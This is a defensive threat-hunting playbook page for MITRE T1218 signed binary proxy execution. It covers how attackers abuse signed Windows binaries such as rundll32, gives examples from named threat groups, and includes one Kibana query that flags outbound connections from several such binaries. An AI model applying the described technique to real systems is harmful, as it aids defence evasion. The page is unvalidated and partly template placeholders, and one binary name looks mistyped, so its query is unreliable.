# T1218 Signed Binary Proxy Execution

-----------------------------------------------------------------------

## Technique Description

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.

## Technique Detection

Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.

## Mitre References

  * [Mitre-Attack](https://attack.mitre.org/techniques/T1218)



-----------------------------------------------------------------------

## Metadata

  * **Last Updated  Date:** 8 July 2021

  * **Author(s):** SSgt Johnathan Smith, SSgt John Beres

  * **Validated:** NO

-----------------------------------------------------------------------

## Overall Hypothesis

- Malicious actors may abuse signed binary executables (Known/observed LOLBins) to run malicious code and bypass process and/or signature-based defenses.

## Adversary Examples

| Adversary Specific Examples | Host Analytics | Network Analytics |
|-----------------------------|----------------|-------------------|
| Example APT/Threat actor | 1, 2 | 2, 3, 5|

#### Gamaredon	
- InvisiMole can register itself for execution and persistence via the Control Panel.
- Pteranodon executes functions using rundll32.exe.

#### Sandworm 	
- Team used a backdoor which could execute a supplied DLL using rundll32.exe.

#### APT29
- The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.
- FatDuke can execute via rundll32.
- PolyglotDuke can be executed using rundll32.exe.
- PowerDuke uses rundll32.exe to load.

#### APT28	
- CORESHELL is installed via execution of rundll32 with an export named "init" or "InitW."[8]

#### Turla	
- Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.

## Detection Blindspots

- Information Here

## Analytical References

- https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/
- https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/
- https://www.f-secure.com/documents/996508/1030745/CozyDuke
- https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf
- https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/
- http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf
- https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf
- [Known/Observed LOLBins (github)](https://lolbas-project.github.io/)
- https://redcanary.com/threat-detection-report/techniques/mshta/
- https://redcanary.com/threat-detection-report/techniques/rundll32/
- https://eqllib.readthedocs.io/en/latest/analytics.html

-----------------------------------------------------------------------

## Host Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.

#### Analytic 1

  * **Information:** Network Connection via Signed Binary

  * **Source:** Windows Audits, Sysmon

  * **Tool:** Kibana

  * **Notes:** 

  * **Query:** ```process.name:(expand.exe or extrac.exe or ieexec.exe or makecab.exe) and event.action:"Network connection detected (rule: NetworkConnect)" and not destination.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)```

-----------------------------------------------------------------------

## Network Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Information Here

#### Analytic 1

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```

#### Analytic 2

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```

